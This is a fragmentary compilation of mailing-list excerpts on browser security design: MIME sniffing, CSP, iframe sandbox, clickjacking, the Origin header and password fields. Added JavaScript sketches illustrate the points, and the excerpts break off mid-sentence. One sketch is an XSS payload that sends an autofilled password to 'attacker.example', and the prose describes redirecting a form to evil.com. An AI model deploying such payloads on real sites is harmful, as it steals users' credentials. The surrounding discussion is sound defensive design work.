It's probably OK to replace the URL of the previous page if it
otherwise doesn't interfere with the ongoing navigation. The old
attacks predated the pushState / replaceState API altogether.
/mz
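A minimal sketch of the use case under discussion - updating the outgoing
page's URL from beforeunload without redirecting the pending navigation
(illustrative only; the thread is about whether browsers should permit it):

  window.addEventListener('beforeunload', () => {
    // replace, never push, so the ongoing navigation is not interfered with
    history.replaceState(history.state, '', '#draft-saved');
  });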
On Sun, Nov 2, 2014 at 1:43 PM, cowwoc wrote:
> On 02/11/2014 12:28 PM, Michal Z
> I believe I have a legitimate use-case (described in comment #9) for needing
> to change the URL in "beforeunload".
I am probably at least partly to blame for the browsers not letting
you do that - I reported several onbeforeunload attacks some 8 years
ago. Sorry! :-)
In general, there is a secu
So I might have started this on the wrong foot, but let's consider the
broader threat model. What do we want to protect against?
1) XSS stealing the passwords / CC numbers entered by the user
manually? This is probably not possible with this proposal; the evil
payload may construct a form where th
> Fair enough - although I worry that the likelihood of people using
> this in conjunction with tightly-scoped per-document CSP (versus the
> far more likely scenario of just having a minimal XSS-preventing
> site-wide or app-wide policy that will definitely not mitigate #3 and
> probably do nothin
>> 1) Change the action value for the form to point to evil.com, where
>> evil.com is in attacker's control,
>
> I hope that this is mitigated by the `form-action` CSP directive, which
> allows the site to control the valid endpoints for form submission, and
> `connect-src`, which allows the same f
>
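For reference, a sketch of the two CSP directives named in the quote,
delivered as a response header (Node-style response object assumed;
hostnames illustrative):

  res.setHeader('Content-Security-Policy',
    "form-action 'self'; connect-src 'self' https://api.example.com");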
I think that one huge problem with this is that the attacker will have
many other, indirect ways to get the value even if you protect direct
access to the field. Two most obvious options include:
1) Change the action value for the form to point to evil.com, where
evil.com is in attacker's
> I think that's Ian's point, that for those file types, we need CT, but for
> others, like manifest files, and image and plugins we shouldn't need.
If we take this route, I think we'd be essentially making sure that
many web applications that are safe today will gradually acquire new
security bug
> I disagree. Much of the Web actually relies on this today, and for the
> most part it works. For example, when you do:
>
>
>
> ...the Content-Type is ignored except for SVG.
Well, that is actually a fairly special case of content that is
difficult for attackers to spoof and that can't be easily
> We probably can't support a well-defined algorithm for detecting
> documents that have distinctive signatures while safely supporting
> formats that don't have them (because there is always a possibility
> that the non-structured format with user-controlled data could be used
> to forge a signatu
>> Yup, from the perspective of a significant proportion of modern
>> websites, MIME sniffing would be almost certainly a disaster.
>
> I'm not suggesting sniffing, I'm suggesting having a single well-defined
> algorithm with well-defined fixed signatures.
>
> For formats that don't have signatures
Two implementation risks to keep in mind:
1) Both jar: and mhtml: (which work or worked in a very similar way)
have caused problems in absence of strict Content-Type matching. In
essence, it is relatively easy for something like a valid
user-supplied text document or an image to be also a valid ar
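A sketch of the "well-defined fixed signatures" approach from the quoted
message - accept content only when its leading bytes match a known magic
number (PNG and GIF shown; the helper name is mine):

  function matchSignature(bytes) {
    const startsWith = (sig) => sig.every((b, i) => bytes[i] === b);
    if (startsWith([0x89, 0x50, 0x4e, 0x47])) return 'image/png';
    if (startsWith([0x47, 0x49, 0x46, 0x38])) return 'image/gif';
    return null; // formats without a signature cannot be validated this way
  }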
> This is about how the Web works, not browser UIs. If I click a link on
> www.computerviruses.com, and it prompts me to save a file to disk, I make my
> decision of what to do with the file based on the context of the link I
> clicked.
In my experience, the web is a lot more complicated than tha
> Downloads are associated with the site the link is on, not the domain the
> resource is served from. If users click a download link and the file comes
> from s3.amazonaws.com, they didn't come from Amazon; they came from your
> page.
I don't believe that's the case in most browser UIs. In fact,
I think I raised this on several other threads; in essence, countless
websites permit users to upload constrained file formats, such as
JPEGs or GIFs used as profile images. With content sniffing attacks,
we've already seen that it's relatively trivial for an attacker to make
files that are both valid
There are substantial negative security consequences to sniffing
content on MIME types that are commonly used as default fallback
values by web servers or web application developers. This includes
text/plain and application/octet-stream.
/mz
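The usual mitigation for the fallback-type problem described above is to
tell browsers not to second-guess the declared type at all - a sketch,
again assuming a Node-style response object:

  res.setHeader('Content-Type', 'application/octet-stream');
  res.setHeader('X-Content-Type-Options', 'nosniff');
  res.setHeader('Content-Disposition', 'attachment; filename="upload.bin"');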
> Any feedback on this revised approach?
My vague concern is that the separation is a bit fuzzy, beyond saying
that window.opener will be null... if that's the only guaranteed
outcome, then maybe that should be spelled out more clearly? The
degree of separation between browsing contexts is intuiti
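The one guaranteed outcome mentioned above - an opener-less window - can be
illustrated with the mechanism that later shipped for it (a present-day
sketch, not what the thread itself proposed):

  const w = window.open('https://example.com/', '_blank', 'noopener');
  console.log(w);   // null - no handle back to the opener
  // ...and in the new window, window.opener is null as well.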
Several questions:
1) How would this mechanism work with named windows (which may be targeted
by means other than accessing opener.*)? In certain implementations (e.g.,
Chrome), the separation in this namespace comes free, but that's not given
for other browsers. There are ways in which the attack
> Tab suggests (on IRC) that this should just be tied to sandbox="", which
> seems reasonable at first blush.
Sandbox is opt-in (which means we'd start revealing origins in
existing settings without a warning); and has other serious
constraints which preclude it from some existing use cases (e.g.,
In fact, in the vein of opt-in disclosure perhaps something like
discloselocation={none|origin|full} would be more convenient - in
which case, you get something like
window.parentLocations[n].{origin|href|hash|...}
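A purely hypothetical sketch of how the proposal above might look from the
embedded document's side - neither the discloselocation attribute nor
window.parentLocations exists in any browser:

  // Embedder:  <iframe src="gadget.html" discloselocation="origin">
  for (const parent of window.parentLocations || []) {
    console.log(parent.origin);  // disclosed
    console.log(parent.href);    // undefined unless discloselocation="full"
  }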
I constantly fear that origin scoping for security mechanisms is too
coarse-grained
I can think of some fringe scenarios where disclosing parent origins
may be somewhat undesirable. One example may be a "double-bagged"
advertisement, where the intent is to not tell the advertiser about
the top-level page the ad is embedded on (visited site ->
pointing to the ad provider site ->
The security problems with drag-and-drop are significantly more
pronounced than just the banking scenario you are describing. Because
the drag-and-drop action is very similar to other types of legitimate
interaction (e.g., the use of scrollbars), many practical
content-stealing attacks have been de
> It would be nice if this could be done orthogonally to rel="noreferrer", and
> in a way that's link-specific instead of global to the whole page; for
> example, , .
There is a fairly strong security benefit of policing it on document-
or even origin-level: it's exceedingly easy to miss an outgoi
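To make the document- or origin-level option concrete, a present-day sketch
(the Referrer-Policy header postdates this thread) alongside the per-link
variant from the quote:

  // document/origin level, set once by the server:
  res.setHeader('Referrer-Policy', 'no-referrer');
  // per-link opt-out, easy to miss on any one outgoing link:
  // <a href="https://example.com/" rel="noreferrer">...</a>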
[ Julian Reschke ]
> Observation: javascript: IMHO isn't a URI scheme (it just occupies a place
> in the same lexical space), so maybe the right thing to do is to document it
> as historic exception that only exists in browsers.
In one of its modes, it's roughly equivalent to data:
(javascript:"f
What about javascript: URLs?
Right now, every browser seems to treat javascript:alert('#') in an
"intuitive" manner.
This likely goes beyond data: and javascript:, so I think it would be
useful to look at it more holistically.
/mz
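A small illustration of the ambiguity: under the "intuitive" treatment
mentioned above, the '#' is part of the script rather than a fragment
delimiter (sketch only):

  location.href = "javascript:alert('#')";  // alerts the string "#"
  // a strict URL parser would instead split at '#', leaving the broken
  // script  alert('  plus a fragment  ')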
> How about deleting the value if the input type is changed away from the
> secure password input type AND that the secure password can only be
> submitted to a similar URI.
Right now, for interoperability, password managers allow a good amount
of fuzziness when matching forms, and I do not believ
> For the last 10+ years, password inputs have been accessible from scripts,
> with nary a complaint. If I have this code:
Denying access to password fields from JavaScript is actually a
somewhat interesting security enhancement when you consider the
behavior of password managers. Right now, if y
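A sketch of the attack that makes this interesting: once a password manager
has autofilled a form, any injected script can read the secret back
(hostname purely illustrative):

  const pw = document.querySelector('input[type="password"]');
  // an XSS payload can exfiltrate the autofilled value:
  new Image().src = 'https://attacker.example/steal?v=' +
      encodeURIComponent(pw.value);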
> I don't think the issue raised was about getting people to save files,
> though. If you can get someone to click a link, you can already point
> them at something that sets the HTTP C-D header.
The origin of a download is one of the best / most important
indicators people have right now (which,
> On Linux you may have comprehensive mailcap lists in /etc, or better
> yet the filename extension to MIME type mappings used by httpds.
Which still don't necessarily map to the behavior of every single file
manager; some of them come with their own rules (heck, even mc does
that IIRC), some rely
> Browsers should just use the same behaviour when encountering the function
> in a HTML attribute.
Keep in mind that the mechanism *is* extremely imperfect. It only
works for MIME types and extensions recognized by the browser (which
is a small list). There's a large disconnect between this set,
> At least in the case of Firefox for that particular case on Windows the
> filename will be sanitized...
Yes, but Firefox is an exception, not a rule; and even that mechanism
is very imperfect (it relies on explicit mappings that are not
guaranteed to be in sync with other OS components; when dow
> So, it's not so much the security issue (the browser's job), but an
> appearance-of-fault issue: the site not wanting to be blamed if the
> browser fails at that job.
Well, the browser does the best it can (i.e., documents the origin of
a download), and the user does the best he can (examines th
> Maybe a bit more contriving could come up with a more plausible example.
My concern is a bit more straightforward. To use a practical example:
just because a social networking site allows nearly arbitrary JPEG
files to be uploaded and served as profile pictures (Content-Type:
image/jpeg) does no
Note that somewhat counterintuitively, there would be some security
concerns with markup-level content disposition controls (or any JS
equivalent). For example, consider evil.com doing this:
Downloading files in general is a very problematic area, because
there's a very fragile transition betwee
Hi folks,
The HTML4 spec said that on and tags, Content-Type
overrides type=. All browser vendors implemented a different behavior,
however, where type= almost always overrides Content-Type.
Plugin vendors, in turn, missed that "almost" part, built extensive
security mechanisms, and promoted us
> As suggested above, could a header be required on compliant browsers to send
> a header along with their request indicating the originating server's
> domain?
Yes, but it's generally a bad practice to release new features that
undermine the security of existing systems, and requiring everybody t
> Servers are already free to obtain and mix in content from other sites, so
> why can't client-side HTML JavaScript be similarly empowered?
I can see two reasons:
1) Users may not be happy about the ability for web applications to
implement an unprecedented level of automation through their clie
> Perhaps we want an "allow-frame-busting" directive? In the
> implementation we have an "allow-navigation" bit that covers
> navigation |top| as well as window.open, etc. Maybe we want a more
> general directive that twiddles this bit?
I'm wondering if sites want to have control over the type o
> Can a frame in @sandbox ever navigate the top-level frame? If not,
> that would make it hard to use @sandbox to contain advertisements,
> which want to navigate |top| when the user clicks on the ad.
Ads would want to be able to do that, but user-controlled gadgets
shouldn't. I suppose the top
> Not escaping " is so easily and quickly discovered that I really don't
> think that's a problem.
The same argument could be made for not escaping <, but I don't think
it's valid in practice - particularly for (hypothetically) constrained
input fields.
>> That would be great. I think Adam propos
> The reason to use a MIME type here is to trick legacy browsers into
> not rendering the response as HTML.
Legacy browsers probably will, anyway :-(
/mz
> I've introduced srcdoc="" to largely handle this. There is an example in
> the spec showing how it can be used.
Yup, sounds good.
> This has been proposed before. The concern is that many authors would be
> likely to make mistakes in their selection of "random" tokens that would
> lead to signi
> But this span will have another span as its
> child, sandboxed. The regular parser sees no entities here, only a
> nested span!
That's a pretty reasonable variant for lightweight sandboxes, IMO. It
does not have the explicit assurance of a token-based approach (i.e.,
will not fail
On Sun, Dec 13, 2009 at 2:00 PM, Adam Barth wrote:
> The sandbox tag is great at addressing that use case. I don't see why
> we should delay it in the hopes that the tag comes back to
> life.
And Adam - as you know, I have deep respect for your expertise and
contributions in this area, so plea
> How do I use the tag to sandbox advertisements?
Huh? But that's not the point I am making... I am not arguing that
iframe sandbox should be abandoned as a bad idea - quite the opposite.
I was merely suggesting that we *expand* the same logic, and the same
excellent security control granularity
> That seems like a backwards way of proceeding. Do you have a proposal
> for unification besides the tag?
The only fundamental objection I have heard against it is the trouble
with XML representation.
The other option is to simply require a traditional CDATA-esque
behavior or a tag parameter -
[...sorry for splitting the response...]
> People screw up CSRF tokens all the time. The closing tag nonce
> design has been floating around for years. The earliest variant I
> could find is Brendan's tag.
Sure, I hinted at it not as a brilliant new idea, but as a possibility.
I do think giving i
> The @sandbox seems like a better fit for the advertising use case.
I am not contesting this, to be clear - I am aware of many cases where
it would be very useful - but gadgets are a fairly small part of the
Internet, and it seems like a unified solution would be more desirable
than several very dif
> Nah, token-guarding is no good. [...] More importantly, though,
> it puts a significant burden on authors to generate unpredictable
> tokens.
Btw, just to clarify - I am not proposing this instead of the current
method; we could very well allow token-guarded sandboxing on divs /
spans, and sandb
> I believe that the @doc attribute, discussed in the original threads
> about @sandbox, will be introduced to deal with that. It'll take
> plain html as a string, avoiding the opaqueness and larger escaping
> requirements of a data:// url, as the only thing you'll have to escape
> is whichever qu
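A sketch of that escaping requirement when inlining untrusted markup into a
sandboxed frame via srcdoc="" (helper name is mine; userComment stands in
for the untrusted string):

  const escapeForSrcdoc = (html) =>
    html.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  const markup =
    '<iframe sandbox srcdoc="' + escapeForSrcdoc(userComment) + '"></iframe>';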
Hi folks,
So, we were having some internal discussions about the IFRAME sandbox
attribute; Adam Barth suggested it would be more productive to bring
some of the points I was making on the mailing list instead.
I think the attribute is an excellent idea, and close to the dream
design we talked abo
On Tue, 30 Sep 2008, Edward Z. Yang wrote:
In that case, you are certainly correct; adding a salt only hinders an
attacker. But if we're worried about Origin giving away a secret
intranet website, I think things should be reasonable. Of course, they
can still dictionary brute-force it...
I g
On Tue, 30 Sep 2008, Edward Z. Yang wrote:
More importantly, since the dictionary of possible inputs is rather
limited, it would be pretty trivial to build a dictionary of site <->
hash pairs and crack the values. It may protect
xyzzy2984.eur.int.example.com, but would still reveal to me you are
co
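A sketch of the dictionary attack being described - with so few plausible
origins, an attacker can simply precompute the hashes (Node's crypto module
assumed; hostnames illustrative):

  const { createHash } = require('crypto');
  const candidates = [
    'https://xyzzy2984.eur.int.example.com',
    'https://intranet.example.com',
    // ...every other guessable hostname
  ];
  const table = new Map(candidates.map(
    (o) => [createHash('sha1').update(o).digest('hex'), o]));
  // table.get(observedOriginHash) recovers the "secret" origin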
On Tue, 30 Sep 2008, Adam Barth wrote:
This could be addressed by sending a cryptographic hash of the origin (using
an algorithm that is commonly available in libraries used by server-side
programmers).
Interesting idea. So you're suggesting something like:
Origin-SHA1: 4e13de73de2d1a1c350eb4
On Wed, 1 Oct 2008, Robert O'Callahan wrote:
I don't think that's secure. The outer page can set the IFRAME's URL to
contain a #xyz fragment identifier
That's really covered in the original proposal. Honest :P In a kludgy
manner, of course (permitting fragments, but not permitting onload
scr
On Tue, 30 Sep 2008, Robert O'Callahan wrote:
If I understand correctly, with Michal's option 3, those sites would
also stop working as soon as the user scrolled down in the framed page
(so that the top-left of the framed page is out of view).
Nope, the restriction applies strictly to the top
On Tue, 30 Sep 2008, Robert O'Callahan wrote:
If the chat gadget is configured to only talk to the site owner, how can it
be abused? I suppose the site owner can discover the chat nick of a visitor
who otherwise wouldn't want to disclose it. That's a risk that the chat
system developers might ve
On Tue, 30 Sep 2008, Robert O'Callahan wrote:
We can easily offer these developers the following options:
a) developers of privileged gadgets can whitelist domains that they trust to
not subvert the UI
How is this achieved? If I have a chat ("talk to site owner using your
$foo chat account")
On Mon, 29 Sep 2008, Hallvord R M Steen wrote:
It still completely ignores the question of how we protect gadgets / mashups
/ whatever that are *designed* to be embedded on potentially untrusted
sites, but depend on having the integrity of their UIs preserved
After giving this quite some thoug
On Mon, 29 Sep 2008, Anne van Kesteren wrote:
A cross-site XMLHttpRequest request would always include Origin. I
haven't really seen other specifications start using it yet, but I
believe there are some experimental implementations for including it in
cross-site POST requests.
Yup, I mean t
On Mon, 29 Sep 2008, Hallvord R M Steen wrote:
To give webmasters more ways to deal with this situation, I think we
should implement the Access Control "Origin" HTTP-header only (assuming
that it should refer to the top site in the frameset hierarchy).
I definitely like the "Origin" proposal
On Sun, 28 Sep 2008, Robert O'Callahan wrote:
There is no way in the world that Microsoft would implement your option
3 in a security update to IE6.
Sure, I'm not implying this. I simply have doubts about any other major
security changes making it into MSIE8 or Firefox 3.
Cheers,
/mz
On Sun, 28 Sep 2008, Robert O'Callahan wrote:
I'm not sure what you're talking about here. I'm specifically NOT talking
about Content-Restrictions or Site-Security-Policies or any other policies
for controlling what a page may do once it has loaded.
I'm expressing approval for your option 1,
"
On Sun, 28 Sep 2008, Michal Zalewski wrote:
If you have faith that all these places can be patched up because we
tell them so, and that these who want to would be able to do so
consistently and reliably - look at the current history of XSRF and XSS
vulnerabilities.
...and consequently, the
On Sat, 27 Sep 2008, Jim Jewett wrote:
Yet opt-in proposals expect content authors to immediately add security
checks everywhere, which is considerably less realistic than having a
handful of webpages adjust their behavior, if we indeed break it (which I
don't think would be likely with the
On Sat, 27 Sep 2008, Jim Jewett wrote:
uhm... that is exactly when involuntary actions are *most* likely.
It's not about merely clicking something accidentally - it's about
clicking at a very specific place, as intended by the attacker, to trigger
a very specific functionality on a targeted
On Sat, 27 Sep 2008, Anne van Kesteren wrote:
Could you list these comprehensive designs perhaps?
I mean, proposals to make it possible for sites to opt in for explicitly
controlling various cross-domain interactions now permitted by default
(which includes including scripts, making POST req
On Sat, 27 Sep 2008, Robert O'Callahan wrote:
Default permission of cross-domain loads is responsible for *a lot* of
problems. Allowing sites to escape that would address a lot of problems,
even if it is opt-in. Eventually we could hope to reach a state where
all browsers support it, and most
On Sat, 27 Sep 2008, Smylers wrote:
All this assuming that the inability to interact with a cross-domain
gadget whose top part is off the screen is a usability problem by
itself, to a degree that invalidates any security benefit for such a
scheme. Many of the earlier security improvements withi
On Fri, 26 Sep 2008, Elliotte Rusty Harold wrote:
It's tongue-in-cheek that I don't expect it to be adopted or seriously
considered (this year). It's not tongue-in-cheek in that I very much
wish it were adopted. That is, I think it's in the realm of the
desirable, not the possible.
Oh yup, a
On Fri, 26 Sep 2008, Maciej Stachowiak wrote:
Maybe I didn't read very well, but I don't see how the "clause for UI action
optimizations" would prevent what I described. Could you spell it out for me
please? It seems to me that the embedded iframes for iGoogle gadgets (or
similar) will indeed
On Fri, 26 Sep 2008, Elliotte Harold wrote:
Absolutely false. The media simply needs to be served from the same host
the blog itself is. This is how almost all the media in my blogs works
today. What little content comes from a 3rd party site in my blogs
(mostly from laziness) could easily be
On Thu, 25 Sep 2008, Maciej Stachowiak wrote:
I meant, corner of the container, rather than actual document rendered
within.
Then can't you work around the restriction by scrolling the contents
inside the iframe and sizing it carefully? (One way to scroll an iframe
to a desired position is t
On Fri, 26 Sep 2008, Robert O'Callahan wrote:
Seems like this will create a really bad user experience. The user
scrolling around in the outer document will make IFRAMEs in it
mysteriously become enabled or disabled.
Well, to put this in perspective - we are talking about cross-domain
IFRAME
On Thu, 25 Sep 2008, Maciej Stachowiak wrote:
C) Treat a case where top-left corner of the IFRAME is drawn out of
a visible area (CSS negative margins, etc) as a special case of
being obstructed by the owner of a current rendering rectangle
(another IFRAME or window.top) and carry o
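Option C describes a browser-level rule, but a gadget can approximate the
intent today by arming sensitive controls only while they are actually
visible in the top-level viewport - a hedged sketch using
IntersectionObserver, which postdates this thread:

  const button = document.querySelector('#confirm'); // sensitive control, name illustrative
  new IntersectionObserver((entries) => {
    button.disabled = entries[0].intersectionRatio < 0.99;
  }, { threshold: [0.99] }).observe(button);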
On Thu, 25 Sep 2008, Collin Jackson wrote:
6) New cookie attribute: The "httpOnly" cookie flag allows sites to
put restrictions on how a cookie can be accessed. We could allow a new
flag to be specified in the Set-Cookie header that is designed to
prevent CSRF and "UI redress" attacks. If a cook
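The cookie-flag direction sketched here is roughly what later shipped as the
SameSite attribute; a present-day example of such a Set-Cookie header
(Node-style response object assumed; value illustrative):

  res.setHeader('Set-Cookie',
    'sid=0123456789abcdef; Secure; HttpOnly; SameSite=Strict; Path=/');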
Hi folks,
I am posting here on the advice of Ian Hickson; I'm new to the list, so
please forgive me if any of this brings up long-dismissed concepts;
hopefully not.
For a couple of months now, along with a number of my colleagues at
Google, we were investigating a security problem that we fe